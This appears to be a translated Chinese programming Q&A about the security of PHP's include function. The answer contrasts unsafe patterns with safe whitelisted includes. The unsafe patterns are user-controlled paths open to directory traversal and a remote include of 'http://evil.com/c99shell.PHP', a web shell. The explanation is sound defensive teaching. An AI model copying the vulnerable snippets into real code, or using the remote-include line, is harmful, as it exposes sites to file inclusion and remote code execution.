我正在使用“include”函数(e.x.“include’head2.PHP’”或“include’class.users.PHP’”)
在我的网站中添加标题或会话类.我真的不记得在哪里,但我听说黑客滥用,不知何故,这个“包含”的东西,发送虚假的包含页面或类似的东西.
所以基本上我想知道什么是“包含”功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求.
在我的网站中添加标题或会话类.我真的不记得在哪里,但我听说黑客滥用,不知何故,这个“包含”的东西,发送虚假的包含页面或类似的东西.
所以基本上我想知道什么是“包含”功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求.
提前致谢.
这一切都取决于你如何实现它.如果您专门设置路径,那么它是安全的.如果允许用户输入确定文件路径而不进行清理或检查,则可能发生攻击.
不安全(目录遍历)
<?PHP include($_GET['file']); ?>
不安全(URL fopen – 如果启用)
<?PHP include('http://evil.com/c99shell.PHP'); ?>
不安全
<?PHP include('./some_dir/' . $_GET['file']); ?>
<?PHP include('./some_dir/' . $_GET['file'] . '.PHP'); ?>
安全(虽然不确定为什么有人会这样做.)
<?PHP $allowed = array( 'somefile.PHP','someotherfile.PHP' ); if (in_array(basename($_GET['file']),$allowed)) { include('./includes/' . basename($_GET['file'])); } ?>
安全
<?PHP include('./includes/somefile.PHP'); ?>
